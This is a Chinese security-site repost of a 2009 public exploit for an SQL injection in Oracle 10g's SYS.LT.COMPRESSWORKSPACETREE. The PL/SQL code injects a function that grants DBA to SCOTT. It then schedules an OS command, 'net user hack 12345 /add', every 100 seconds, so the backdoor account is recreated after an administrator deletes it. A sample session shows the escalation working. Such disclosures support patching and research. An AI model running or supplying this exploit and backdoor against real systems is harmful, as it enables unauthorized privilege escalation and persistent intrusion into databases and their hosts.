首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
来源:http://www.dsecrg.ru 作者:Polyakov 发布时间:2009-01-07  
/*********************************************************/
/*Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit**/
/**grant DBA and create new  OS user (using scheduller)***/
/*********************************************************/
/***********exploit grant DBA to scott********************/
/***********and execute OS command "net user"*************/
/***********using scheduler*******************************/
/*********************************************************/
/***********tested on oracle 10.1.0.5.0*******************/
/*********************************************************/
/*********************************************************/
/* Date of Public EXPLOIT: January 6, 2009               */
/* Written by:             Alexandr "Sh2kerr" Polyakov   */
/* email:                  Alexandr.Polyakov@dsec.ru     */
/* site:                   http://www.dsecrg.ru          */
/*                         http://www.dsec.ru            */
/*********************************************************/
/*Original Advisory:                                     */
/*Esteban Martinez Fayo [Team SHATTER ]                  */
/*Date of Public Advisory: November 11, 2008             */
/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/
/*********************************************************/

select * from user_role_privs;

CREATE OR REPLACE FUNCTION Z return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
EXECUTE IMMEDIATE 'GRANT CREATE ANY JOB TO SCOTT';
EXECUTE IMMEDIATE 'GRANT CREATE EXTERNAL JOB SCOTT';
COMMIT;
RETURN 'Z';
END;
/

exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.Z()=''Z');
exec SYS.LT.COMPRESSWORKSPACETREE('sh2kerr'' and SCOTT.Z()=''Z');


/* We create backdored OS user "hack" with password 12345 using External Job's  */
/* Note that in this method new user will be created every 100 seconds          */
/* so if administrator find it and will try to delete it                        */
/* user hack will be created again. So it is also a simle backdoor              */

BEGIN
DBMS_SCHEDULER.CREATE_PROGRAM (
program_name=> 'MyCmd',
program_type=> 'EXECUTABLE',
program_action =>’cmd /c "net user hack 12345 /add"’,
enabled=> TRUE);
END;
/

BEGIN
DBMS_SCHEDULER.CREATE_JOB (
   job_name=> 'extjobexec',
   program_name=> 'MyCmd',
   repeat_interval=> 'FREQ=SECONDLY;INTERVAL=100',
   enabled=> TRUE,
   comments=> 'create backdoor user every 100 seconds');
END;
/


/* here we can paste any OS command for example create new user */

exec dbms_scheduler.run_job('extjobexec');
/

select * from user_role_privs;















---------------------------------------------------------------------------------
-----------------------------EXAMPLE OF EXPLOITATION ----------------------------
---------------------------------------------------------------------------------


SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
OUTLN                          CONNECT                        NO  YES NO
OUTLN                          RESOURCE                       NO  YES NO

SQL> CREATE OR REPLACE FUNCTION X return varchar2
  2  authid current_user as
  3  pragma autonomous_transaction;
  4  BEGIN
  5  EXECUTE IMMEDIATE 'GRANT DBA TO OUTLN';
  6  COMMIT;
  7  RETURN 'x';
  8  END;
  9  /

Function created.



SQL> exec SYS.LT.CREATEWORKSPACE('zz'' and outln.X()=''x')

PL/SQL procedure successfully completed.

SQL> exec SYS.LT.REMOVEWORKSPACE('zz'' and outln.X()=''x')

PL/SQL procedure successfully completed.

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
OUTLN                          CONNECT                        NO  YES NO
OUTLN                          DBA                            NO  YES NO
OUTLN                          RESOURCE                       NO  YES NO

SQL>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Oracle 10g SYS.LT.MERGEWORKSPA
·RiotPix <= 0.61 (forumid) Blin
·Oracle 10g SYS.LT.REMOVEWORKSP
·Debian GNU/Linux XTERM (DECRQS
·Safari (Arguments) Array Integ
·Goople <= 1.8.2 (frontpage.php
·PHPAuctionSystem (XSS/SQL) Mul
·Rosoft Media Player 4.2.1 Loca
·VUPlayer 2.49 (.wax File) Loca
·SeaMonkey <= 1.1.14 (marquee)
·Joomla com_phocadocumentation
·VUPlayer version 2.49 local de
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved